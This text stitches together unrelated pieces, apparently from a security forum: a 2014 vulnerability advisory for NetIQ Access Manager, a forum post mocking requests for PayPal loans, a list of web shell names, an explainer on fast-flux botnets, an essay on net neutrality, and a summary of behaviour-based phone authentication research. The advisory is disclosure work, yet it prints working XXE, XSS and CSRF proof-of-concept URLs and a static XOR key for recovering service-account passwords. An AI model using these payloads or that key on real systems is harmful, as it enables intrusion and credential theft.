SEC Consult Vulnerability Lab Security Advisory < 20141218-2 > ======================================================================= title: Multiple high risk vulnerabilities product: NetIQ Access Manager vulnerable version: 4.0 SP1 fixed version: 4.0 SP1 Hot Fix 3 CVE number: CVE-2014-5214, CVE-2014-5215, CVE-2014-5216, CVE-2014-5217 impact: High homepage: https://www.netiq.com/ found: 2014-10-29 by: W. Ettlinger SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor/product description: --------------------------- "As demands for secure web access expand and delivery becomes increasingly complex, organizations face some formidable challenges. Access Manager provides a simple yet secure and scalable solution that can handle all your web access needs—both internal as well as in the cloud." URL: https://www.netiq.com/products/access-manager/ Business recommendation: ------------------------ An attacker without an account on the NetIQ Access Manager is be able to gain administrative access by combining different attack vectors. Though this host may not always be accessible from a public network, an attacker is still able to compromise the system when directly targeting administrative users. Because the NetIQ Access Manager is used for authentication, an attacker compromising the system can use it to gain access to other systems. SEC Consult highly recommends that this software is not used until a full security review has been performed and all issues have been resolved. Vulnerability overview/description: ----------------------------------- 1) XML eXternal Entity Injection (XXE, CVE-2014-5214) Authenticated administrative users can download arbitrary files from the Access Manager administration interface as the user "novlwww". The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015993 2) Reflected Cross Site Scripting (XSS, CVE-2014-5216) Multiple reflected cross site scripting vulnerabilities were found. These allow effective attacks of administrative and SSLVPN sessions. The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015994 3) Persistent Site Scripting (XSS, CVE-2014-5216) A persistent cross site scripting vulnerability was found. This allows effective attacks of administrative and SSLVPN sessions. The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015996 4) Cross Site Request Forgery (CVE-2014-5217) The Access Manager administration interface does not have CSRF protection. The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015997 5) Information Disclosure (CVE-2014-5215) Authenticated users of the administration interface can gain authentication information of internal administrative users. The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015995 By combining all of the above vulnerabilities (CSRF, XSS, XXE) an unauthenticated, non-admin user may gain full access to the system! Proof of concept: ----------------- 1) XML eXternal Entity Injection (XXE) As an example, the following URL demonstrates the retrieval of the /etc/passwd file as an authenticated administrative user: https://<host>:8443/nps/servlet/webacc?taskId=fw.PreviewObjectFilter&nextState=initialState&merge=fw.TCPreviewFilter&query=<!DOCTYPE+request+[%0a<!ENTITY+include+SYSTEM+"/etc/passwd">%0a]><query><container>%26include%3b</container><subclasses>false</subclasses></query> 2) Reflected Cross Site Scripting (XSS) The following URLs demonstrate different reflected XSS flaws in the administration interface and the user interface. https://<host>:8443/nps/servlet/webacc?taskId=dev.Empty&merge=dm.GenericTask&location=/roma/jsp/admin/view/main.jss'%2balert+('xss')%2b' https://<host>:8443/roma/jsp/debug/debug.jsp?xss=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E https://<host>:8443//nps/servlet/webacc?taskId=debug.DumpAll&xss=%3Cimg%20src=%22/404%22%20onerror=%22alert+%28%27xss%27%29%22%3E https://<host>/nidp/jsp/x509err.jsp?error=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E https://<host>/sslvpn/applet_agent.jsp?lang=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E 3) Persistent Site Scripting (XSS) The following URL injects a stored script on the auditing page: https://<host>:8443/roma/system/cntl?handler=dispatcher&command=auditsave&&secureLoggingServersA='){}};alert('xss');function+){if('&port=1289 4) Cross Site Request Forgery As an example, an attacker is able to change the administration password to '12345' by issuing a GET request in the context of an authenticated administrator. The old password is not necessary for this attack! https://<host>:8443/nps/servlet/webacc?taskId=fw.SetPassword&nextState=doSetPassword&merge=dev.GenConf&selectedObject=P%3Aadmin.novellP&single=admin.novell&SetPswdNewPassword=12345&SetPswdVerifyPassword=12345 5) Information Disclosure The following URLs disclose several useful information to an authenticated account: https://<host>:8443/roma/jsp/volsc/monitoring/dev_services.jsp https://<host>:8443/roma/jsp/debug/debug.jsp The disclosed system properties: com.volera.vcdn.monitor.password com.volera.vcdn.alert.password com.volera.vcdn.sync.password com.volera.vcdn.scheduler.password com.volera.vcdn.publisher.password com.volera.vcdn.application.sc.scheduler.password com.volera.vcdn.health.password The static string "k~jd)*L2;93=Gjs" is XORed with these values in order to decrypt passwords of internally used service accounts. By combining all of the above vulnerabilities (CSRF, XSS, XXE) an unauthenticated, non-admin user may gain full access to the system! Vulnerable / tested versions: ----------------------------- The vulnerabilities have been verified to exist in the NetIQ Access Manager version 4.0 SP1, which was the most recent version at the time of discovery. Vendor contact timeline: ------------------------ 2014-10-29: Contacting security@netiq.com, sending responsible disclosure policy and PGP keys 2014-10-29: Vendor redirects to security@novell.com, providing PGP keys through Novell support page 2014-10-30: Sending encrypted security advisory to Novell 2014-10-30: Novell acknowledges the receipt of the advisory 2014-12-16: Novell: the vulnerability fixes will be released tomorrow; The CSRF vulnerability will not be fixed immediately ("Since this can be done only after an authorized login"); two XSS vulnerabilities can not be exploited ("We could not take advantage or retrieve any cookie info on the server side - it looks like it's a client side cross scripting attack.") 2014-12-16: Explaining why those vulnerabilities can be exploited 2014-12-17: Novell: Fix will be released tomorrow 2014-12-17: Verifying release of advisory tomorrow 2014-12-18: Novell: Advisory can be released 2014-12-18: Coordinated release of security advisory Solution: --------- Update to the latest available of Access Manager and implement workarounds mentioned in the KB articles by Novell linked above. Workaround: ----------- For some vulnerabilities, Novell provides best practice recommendations in the URLs linked above. Advisory URL: ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult Interested to work with the experts of SEC Consult? Write to career@sec-consult.com EOF W. Ettlinger / @2014 Source

ba da mai veniti multi cu cerseala? Off:// Aveti idee cum pot face rost de 1 milion de dolari? mai am nevoie doar de 1 milion si o sa fiu milionar! https://rstforums.com/forum/94024-ajutor-imprumut.rst https://rstforums.com/forum/60486-imprumut.rst https://rstforums.com/forum/75076-3-centi-paypal.rst https://rstforums.com/forum/62373-imprumut-3-euro.rst https://rstforums.com/forum/85639-imprumut-paypal.rst https://rstforums.com/forum/71639-5-e-paypal.rst https://rstforums.com/forum/86029-imprumut-3-paypal-pana-maine.rst https://rstforums.com/forum/88712-care-s-mi-dea-n-mprumut-1-a.rst https://rstforums.com/forum/88965-cerere.rst https://rstforums.com/forum/88936-cerere-paypal.rst https://rstforums.com/forum/91739-imprumut-cu-1-0-73-e-paypal.rst https://rstforums.com/forum/92423-imprumut-2-paypal.rst https://rstforums.com/forum/93231-salut-rst.rst https://rstforums.com/forum/93989-am-nevoie-de-ajutor.rst

CCCPShell Acid Shell v2 b374k 2.2 Shell

Introduction In this series of articles, we will learn about a not-so-new type of attack, but one of the most difficult attacks to control. Yes, we will lean about the demon Fast Flux!! In this article, we will learn about what exactly Fast Flux is, types of Fast Flux, and how Fast Flux works. In the next article of this series, we will learn about why it is difficult to detect Fast Flux in the environment, and then finally the recommended ways to detect Fast Flux. What is Fast Flux? The Fast Flux attack is generally used by bots around the world to hide their phishing and malware delivery sites behind an ever changing network of compromised hosts. It can also refer to the combination of peer-to-peer networking, distributed command and control, web-based load balancing and proxy redirection used to make malware networks more resistant to discovery and counter-measures. How Fast Flux Works The basic idea behind Fast Flux is to have numerous IP addresses associated with a single fully qualified domain name, where the IP addresses are swapped in and out with extremely high frequency through changing DNS records. These IP addresses are swapped in and out of flux with extreme frequency, using a combination of round-robin IP addresses and a very short Time-To-Live (TTL) for any given particular DNS Resource Record (RR). Website hostnames may be associated with a new set of IP addresses as often as every 3 minutes, which means that the end user client i.e. browser connecting to the same website every 3 minutes would actually be connecting to a different infected computer each time. The large pool of rotating IP addresses are not the final destination of the request for the content. Instead, compromised front end systems are merely deployed as redirectors called as flux agents funnel requests and data to and from other backend servers, which actually serve the content. Essentially, the domain names and URLs for advertised content no longer resolve to the IP address of a specific server, but instead fluctuate amongst many front end redirectors or proxies, which then in turn forward content to another group of backend servers. In addition, the attackers ensure that the compromised systems they are using to host their scams have the best possible bandwidth and service availability. They often use a load-distribution scheme which takes into account node health-check results, so that unresponsive nodes are taken out of flux and content availability is always maintained. Types of Flux Networks Fast Flux networks are classified under 2 major categories: Single flux networks: These are networks in which a set of compromised nodes register and deregister their address as a part of DNS address record list for a single DNS name. For example, in the figure below we can see that in the case of normal client server communication, a normal end user agent like a web browser requests the server and the server fulfils the request of the client, whereas in a single flux network, the end user agent like a web browser communication with the server is proxied via a redirector normally called a flux-bot. For example, the below figure shows that the victim request for example.com and the browser are actually communicating with the flux network. The request thus gets redirected to the target website. Single flux service networks change the DNS records for their front end node IP address as often as every 3-10 minutes, so even if one flux-agent redirector node is shut down, many other infected redirector hosts are standing by and available to quickly take its place. Because Fast Flux techniques utilize blind TCP and UDP redirects, any directional service protocol with a single target port would likely encounter few problems being served via a Fast Flux service network. For example, along with DNS and HTTP services, it also includes services such as SMTP, IMAP, POP, etc. Double flux networks: These networks are characterized by multiple nodes registering and deregistering as a part of DNS NS records. Both the DNS A record sets and the authoritative NS records for a malicious domain are continually changed in a round robin manner and advertised into the Fast Flux service network. The below figure outlines how double flux networks actually work and how they are different from single flux networks. First let’s just revise how the single flux networks work. Suppose the user is requesting a resource named http://abc.example.com so in the figure we can see that first the end user client i.e. browser asks the DNS root NS for resolution of top level domain i.e. com. Root NS then responds with the respective NS address. In the next step, the browser queries the NS for the domain example.com and receives as an answer a referral to the nameserver ns.example.com. Then, the browser queries ns.example.com for the address abc.example.com. NS responds with an IP address, and since it is a single flux network, this IP address value changes frequently. Now let’s see how the double flux networks works. Everything is same except for the last step, where the client asks the authoritative NS for the resolution of abc.example.com. In double flux networks, the IP of the authoritative NS itself is changing — frequently. When a DNS request for abc.example.com is received from the client, the current authoritative nameserver forwards the queries to the mothership node for the required information. The client can them attempt to initiate direct communication with the target system, although the target system will itself be a dynamically changing front end flux-agent node. This provides an additional layer of redundancy and survivability within the malware network. I think readers will now have a better understanding of Fast Flux networks, what are their types and how they work. In the next article, we will see how an attacker can benefit from this type of attack, why it is difficult to detect Fast Flux networks, and then the recommended ways to detect them. References Fast flux - Wikipedia, the free encyclopedia Source

Introduction Years of discussion on the right to have a free and open Internet have not yet solved the matter, and the issue is still a subject of heated debate for stakeholders: users, telecommunications companies and governments. The discussion revolves not only around the ability of government to control information and services that travel on the Net, but also on the possibility of telecommunications providers to decide which content to prioritize. Much has been written on the argument, but where do we currently stand? This article will highlight recent proposals and statements by government officials that have brought the subject back to light and the different stances that European countries and the U.S. are taking on the subject. The Basis of the Argument The fundamental issue in the network neutrality debate is the principle of open access to the net and the possibility by broadband traffic providers to ease or slow access by users to information, applications, sites and platform as they please, favoring, most likely, higher paying customers. Those who argue pro and against network neutrality bring to the table compelling reasons in favor of their argument. Network neutrality advocates believe that whenever an Internet Service Provider (ISP) treats some broadband traffic or some network users differently, it is going against basic principles that have governed the Internet so far, including free access to information by all. They are concerned that this form of discrimination could eventually make the Internet less valuable to end users. Pro network neutrality are not only many users but also most renowned Internet companies like Amazon, eBay and Vonage and many more, worried that suddenly broadband providers will have the power to decide which competing application to favor. ISPs should not control what data or how fast content arrives to users, and definitely should not be concerned about what content is transmitted (as long as it is lawful), but only that it is transmitted properly. Such a power for telecoms providers would stifle competition and slow the pace of broadband deployment that was designed to empower consumers. Many advocates for this retained freedom are also in the academic world. Lawrence Lessig, an American academic and political activist, for instance, is a supporter of the network neutrality movement. He has asked Congress to defend Michael Powell’s four Internet freedoms (i.e., freedom to access content, to use applications, to attach personal devices, to obtain service plan information), believing openness will trigger a new wave of innovation. Tim Wu, an American academic professor at Columbia Law School, whose paper Network Neutrality, Broadband Discrimination explores a non-discrimination regime, and self- or non-regulation approach to preserving network neutrality, is devoted to keeping the openness of the Internet and conveys that network service providers should not be allowed to deny people access to web resources or prioritize certain content. Wu has also pressed FCC for network neutrality throughout wireless computing and insists telecom carriers should carry content without discrimination. Even U.S. politicians have come forward to express concern over net neutrality. President Obama, for example, says he is unequivocally committed to net neutrality, and would be opposed to any Federal Communications plan that creates a so-called Internet “fast-lane.” It is no surprise, instead, that many telecom providers are continuing the debate for less neutrality and more control. With the Internet becoming more data-intensive and fitting for new technologies (e.g., VoIP, IPTV, Wi-Fi, power-line communication) and suiting ongoing demands for modern audio and video applications on the Internet, which are increasing bandwidth requirements, telecom carriers believe they have a right to decide what is transmitted on their networks and at what price too. Therefore, they want to be allowed to favor their own content and charge extra fees to give others the VIP treatment; In addition, they want to be able to deny those who cannot afford the high-class service. In general, cable companies want to end strict net neutrality and are against treating all data on the Internet equally; being for-profit companies, they believe in their right to charge different fees according to services provided and slow down any sites that will not pay up. In other words, cable carriers want to charge Internet content companies, such as Google and Netflix, for faster and better Internet service. Those that pay will be guaranteed their content reaches end users ahead of those who do not pay. Higher costs are justified by the need of frequently upgrading the infrastructure and having to meet the increasing demand of speed and bandwidth due to the growth in audio and HD video content sharing. Network providers could favor some clients and give them higher speed networks while degrading the service of specific content providers. This matter would potentially have a major impact not only on individual Internet users but also on online companies, especially smaller businesses that rely on the open Internet to launch their products and be able to reveal their goods, applications and services to customers. This, of course, requires all data on the Internet to be treated equally and broadband carriers to route all traffic in a neutral manner, without blocking, speeding up, or slowing down particular applications or content. People want to preserve the Internet as is with no government regulation or any legal intervention that would allow network operators to dictate what people can do online. Consequently, this is how the whole debate started and progressed; it has grown as a major topic of discussion with regard to the theoretical framework set forth by the Federal Communications Commission that has increased oversight of this area. FCC’s Proposal and Reactions The FCC’s stand on the subject of network neutrality was clear. In December 2010, the commission had issued the Open Internet order to establish three basic rules for ISPs to follow: Transparency of the network management practices, performance and terms of service No blocking of lawful content, applications and services No unreasonable discrimination when transmitting lawful traffic The FCC was protecting net neutrality, in the beginning at least. Chairman Tom Wheeler’s net neutrality proposal to federal court about a new open Internet framework is now challenging the concept. His set of rules for an online fast lane has been criticized. In fact, a number of complaints have come forward to say that it would undermine the goal of net neutrality; an “overwhelming surge” in commenters providing feedback, mostly criticisms, to the FCC’s online comment filing system about its recent proposal show how touchy the subject is. The proposal is still in line with the net neutrality stance of the FCC, but for the first time, possibly introduces different rules between “wholesale” and “retail” transactions, which would be regulated in lighter ways. Alongside end users, Internet activists and many U.S. politicians believe in a free and open Internet with no arbitrary fees or slow lanes for sites that cannot pay for technology that serves their interests. Those that support net neutrality are deeply concerned about FCC’s controversial net neutrality proposal and show concern on where the Internet is going. It is also becoming an economic problem, and this probably explains the recent interventions of higher political figures, including President Obama, in the debate. The President released an official statement affirming, “An open Internet is essential to the American economy, and increasingly to our very way of life. By lowering the cost of launching a new idea, igniting new political movements, and bringing communities closer together, it has been one of the most significant democratizing influences the world has ever known.” The President urges the FCC not to “allow Internet service providers (ISPs) to restrict the best access or to pick winners and losers in the online marketplace for services and ideas […] and implement the strongest possible rules to protect net neutrality.” On the other side of the argument stands Michael Powell, a former chairperson of FCC (2001–05), who is the current president of the lobbyist trade group the National Cable & Telecommunications Association (NCTA). He has contributed numerous editorials (in the National Journal and other media sources) and provided opinion pieces in opposition to net neutrality calling for ISPs to have pay-to-play fast lanes, for the sake of Internet availability. Michael Powell argues that net neutrality impairs rather than helps advancement in technology. He believes regulations discourage new competitive entries in the broadband provider world, favor larger regulated companies, discourage investments, and effectively kill innovation. Net neutrality in Europe The debate over the issue of net neutrality has gone on for years in the U.S. Is the rest of the world immune? Certainly not. The debate has extended internationally, where the problem has become terrestrial-network centered, especially in Europe. This has turned out to be a problem on a wide scale, influenced by state level politics and, ultimately, regarding consumer choices relating to broadband Internet access services. Just a few months ago, in the spring of 2014, Europe discussed in its multi-country parliament the new rules and regulations for the managing of the Internet arena. The response of European lawmakers was unmistakable: a strong stance in defense of net neutrality. They voted to limit the ability of telecommunication providers to charge third parties in order to provide faster network access. Providers will be able to limit and slow down services only for a limited time in particular cases to include network security needs or court orders. Acknowledging that ISPs are still commercial entities with expenses (due to costly network upgrades to provide more advanced services to clients), telecom providers will be allowed to offer specialized services at a premium (to include video services and some cloud business applications) but that can’t be at the disadvantage of other clients; in addition, the services must be provided by ISPs and not third parties. Now it will be up to each individual European country to receive and enforce the rules, but the European Parliament vote is definitely a step towards the security of the net neutrality principle in Europe. Conclusion Conceivably, the viewpoint of Jon Peha from Carnegie Mellon University in his paper “The Benefits and Risks of Mandating Network Neutrality, and the Quest for a Balanced Policy” could clear up the issue on hand and be a way out of the debate, as it proposes a balanced approach to the concerns of those who are pro and against net neutrality. “Success depends on moving the debate from vague principles to specific details about what practical forms of discrimination should and should not be allowed, and where one can prohibit the harmful without prohibiting the beneficial, ” stated Peha back in 2006. The question may not be who ought to pay for certain Internet services, but rather, more importantly, work out the rights and freedoms consumers and carriers deserve. With Obama having spoken last month demanding the FCC to keep the Internet free & open, one may question if the FCC will listen and consider reclassifying broadband Internet service as a telecommunications service in order to preserve net neutrality. It seems that the U.S. president’s take on the matter will highly influence the debate in the U.S. and may force the government to issue clear regulations to control the perceived power of ISPs. References Carlsmith, E. M. & Wendell, L. C. (2006). Testimony of Lawrence Lessig – In Support of Network Neutrality. Retrieved from http://moritzlaw.osu.edu/students/groups/is/files/2012/02/lessig-formatted.pdf Kastrenakes, J. (2014, September 16). FCC received a total of 3.7 million comments on net neutrality. Retrieved from FCC received a total of 3.7 million comments on net neutrality | The Verge King, A. (2014, September 10). King Calls on FCC to Adopt Stronger Net Neutrality Rules. Retrieved from Press Release | Press Releases | Newsroom | Angus King | U.S. Senator for Maine Miller, Z. L. (2014, October 9). Obama Signals Opposition to ‘Fast Lanes’ in Support of Net Neutrality. Retrieved from Obama Signals Opposition to 'Fast Lanes' in Support of Net Neutrality - TIME Open Internet Coalition. (n.d.). Why an Open Internet – Openness is a Fundamental Principle of the Internet. Received from Open Internet Coalition: Why an Open Internet Peha, J. M. (2006). The Benefits and Risks of Mandating Network Neutrality, and the Quest for a Balanced Policy. Retrieved from Carnegie Mellon University, at http://repository.cmu.edu/cgi/viewcontent.cgi?article=1021&context=epp Powell, M. (2014, October 31). Michael Powell: The FCC and competition. Retrieved from Michael Powell: The FCC and competition - The Orange County Register The White House, United States Government. (n.d.). Net Neutrality: President Obama’s Plan for a Free and Open Internet. Retrieved from Net Neutrality: President Obama's Plan for a Free and Open Internet | The White House Wyatt, E. (2014, April 23). F.C.C., in a Shift, Backs Fast Lanes for Web Traffic. Retrieved from http://www.nytimes.com/2014/04/24/technology/fcc-new-net-neutrality-rules.html?_r=0 Source

Introduction The rapid diffusion of mobile technology and the convergence of numerous services that use the paradigms, including social networking, cloud computing and payment, are urging IT and security industries to develop new solutions for the user authentication. Passcodes, PINs and thumbprints are a few samples of mechanisms that could be adopted to protect mobile devices. Security experts are aware that human behavior represents the weakest link in the security chain. For this reason, one of their principal goals is to improve the user’s experience with effective and easy to use security measures. The above methods for example are effective, but users are induced into misbehavior by laziness and carelessness. Mobile devices are becoming an essential component in our daily life. They manage a huge quantity of information that concurs to the definition of our digital identity. Mobile devices are used to maintain relationships on a social network, to complete payments as part of a two-factor authentication scheme for web services, and to store sensitive user data. Traditional authentication methods are perceived by mobile users as a waste of time. The majority of them do not use authentication on their mobile phones. The problem is that users are, in the majority of cases, totally unaware of principal cyber threats and ignore the importance of authentication processes. Groups of research and mobile device vendors are trying to improve users’ experience related the authentication processes by introducing user behavior and biometric analysis. The research industry is trying to develop implicit authentication mechanisms that rely on user behavior, and is accomplished by building so-called user profiles from various sensor data. The User Behavior Modelling approach with mobile device sensors To overcome the users’ wrong habits and improve their experience while maintaining a significant level of security, a group of researchers at the Glasgow Caledonian University (Hilmi Gunes Kayac?k, Mike Just, Lynne Baillie, David Aspinall and Nicholas Micallef) has developed a sensor-based authentication method that could simplify the verification of a phone’s user identity. The proposed approach is based on the definition of a user profile through the data collected by the numerous sensors that are present in the mobile phone. If the user behavior observed by the device sensors appears consistent with his profile, the device will have high comfort, while in the presence of some discrepancies a new authentication action is required and alternative measures will be triggered, such as requiring a passcode. It is clear that this kind of approach is more comfortable for the user due to the reduction of the occurrences of explicit authentication. The approach encourages more individuals to adopt this kind of authentication mechanisms for their devices. “We propose a lightweight, and temporally and spatially aware user behaviour modelling technique for sensor-based authentication. Operating in the background, our data driven technique compares current behaviour with a user profile. If the behaviour deviates sufficiently from the established norm, actions such as explicit authentication can be triggered. To support a quick and lightweight deployment, our solution automatically switches from training mode to deployment mode when the user’s behaviour is sufficiently learned. Furthermore, it allows the device to automatically determine a suitable detection threshold,” reports the abstract titled “Data Driven Authentication: On the Effectiveness of User Behaviour Modelling with Mobile Device Sensors”. User Behaviour Modelling could prevent unauthorized access to a user’s phone, because the technique is able to discriminate the legitimate owner of the device. The technique developed by the researchers is very effective. It is very interesting the way they create the user’s profile based on habits, for example, examining the nearest cellphone towers to create contextual “anchors” used to define user behavior throughout the day. This means that the technique uses location data related to the user’s movements during an ordinary day. The researchers based their analysis on the concept of “anchor”, a sort of snapshot used by the experts to gather information on the user habit, including mobile apps used, WI-Fi networks accessed, and connections with other devices through Bluetooth. The “anchor” is also used to collect information related to the environment surrounding the mobile device, for example the noise and light levels of the areas visited by the user. All the data collected by the researchers allowed them to profile users. The experts defined an algorithm to match real time behavior with normal behavioral patterns. The results of the experiments conducted on the algorithm in a few weeks are surprising. The model allowed them to discover if a stranger had stolen a user’s smartphone in two minutes with 99% accuracy. The researchers also made a series of tests in a worst case scenario. For example, they simulated the theft of the mobile made by a roommate who was even given a list of the apps the owner generally used. In this case, the software designed by the team of researchers discovered the theft in about ten minutes with 53% accuracy. The experts also explained that the algorithm presents a low rate of false positives. The User Behavior Modelling technique The researchers designed their software to operate in training mode until it will be able to track a user’s profile. This activity is transparent for the end-user and will be completed once the application has defined a user’s profile through the analysis of his routine. The team of experts highlighted that, different from previous works, the “learning mode” implemented in the solution is incremental and collects data until it is able to track a user’s profile. “We however argue that training duration must be set automatically on a per user basis since, as our evaluation shows, there is no one-size-fits-all,” states the paper. Other similar works incorporated user feedback for refinement of tracked profiles, and they do not consider the duration of training. The first approach is not considerable for the deployment of the technology on a large scale, because it is reasonable to expect that a user will not expend any effort in ‘teaching’ the device by providing feedback, “but they will quickly grow tired if frequent and labor-intensive feedback is required”. The profiling technique elaborated by the experts is based on the definition of temporal and spatial models that are built starting from the data in a lightweight and non-parametric way. Once the algorithm has qualified a profile, the training is completed and the application switches from the training mode to a deployment mode. At this point, every time the parameters defined by the model are below the threshold, which was calculated considering user settings, the software launches an authentication challenge. The dataset used by the researchers for the tests is composed of data collected by seven staff and students of the Glasgow Caledonian University. The data collected in 2013 from Android devices includes various kinds of information like sensor data from WI-Fi networks, cell towers data, application usage, surrounding environment’s parameters (light and noise levels) and device system stats. Data composing the dataset was collected in a period of variable duration, from 2 weeks to 14 weeks for different users. To improve the efficiency of the analysis, the experts included in the dataset a detailed diary for each profile, which allows them to conduct further investigation on anomalies. Figure 1 – Summary of the GCU, Rice and MIT datasets used in the tests The researchers examined different attack scenarios based on the attacker’s level of access to a user’s frequent locations and his knowledge about the victim’s habits. The experts defined two adversarial levels, the uninformed adversary, who knows very little about the victim and his behavior, and an informed adversary that has a deep knowledge of a target user and his behavior. Additionally, the researchers defined an outsider to be a person who steals the mobile and runs away, while an insider has access to a location that the user frequently visits and attempts to use the mobile device at the same places as the legitimate users. The results are very interesting. The informed attacks produce higher comfort levels compared to uninformed attacks. Anyway, they are not able to bypass the detection mechanism developed by the researchers. Figure 2 – Test Results The researchers announced that they will continue the investigations on the use of behaviour modelling, in particular analyzing different supervised learning techniques for profiling. Is the User Behavior Modelling an efficient theft deterrent? Despite that results of tests conducted by the experts demonstrate that the technique could be very effective against the theft of mobile devices, there are serious considerations to make about the users’ privacy. This kind of algorithms elaborates an impressive amount of data to profile users and to define a pattern for its analysis. Anyway, it is easy to predict that privacy advocates could criticize the technique due to possible use for surveillance purposes. The data-tracking and user profiling through the definition of contextual anchors is very invasive. For this reason, it is crucial to understand how to implement the technique in a real commercial scenario. Principal providers of mobile OS and hardware vendors like Google and Apple are very interested in implementation of the technique in their operating systems. The researchers explained that their “User Behavior Modelling” algorithm could be very effective for payment systems like Apple Pay, and could allow securing a user’s daily purchases without constantly typing in secret passcodes. The future applications of User Behavioral Modelling techniques depend on the capability of coders to implement models without user data ever leaving the device. The work we have analyzed proposed a lightweight, non-parametric modelling approach that can be implemented on modern mobile devices and determine when to stop the learning mode and the threshold for detection, both automatically from the data. References [1410.7743] Data Driven Authentication: On the Effectiveness of User Behaviour Modelling with Mobile Device Sensors Spying Software Spots Phone Theft In 2 Minutes, No Password Needed | Co.Design | business + design http://arxiv.org/ftp/arxiv/papers/1410/1410.7743.pdf Source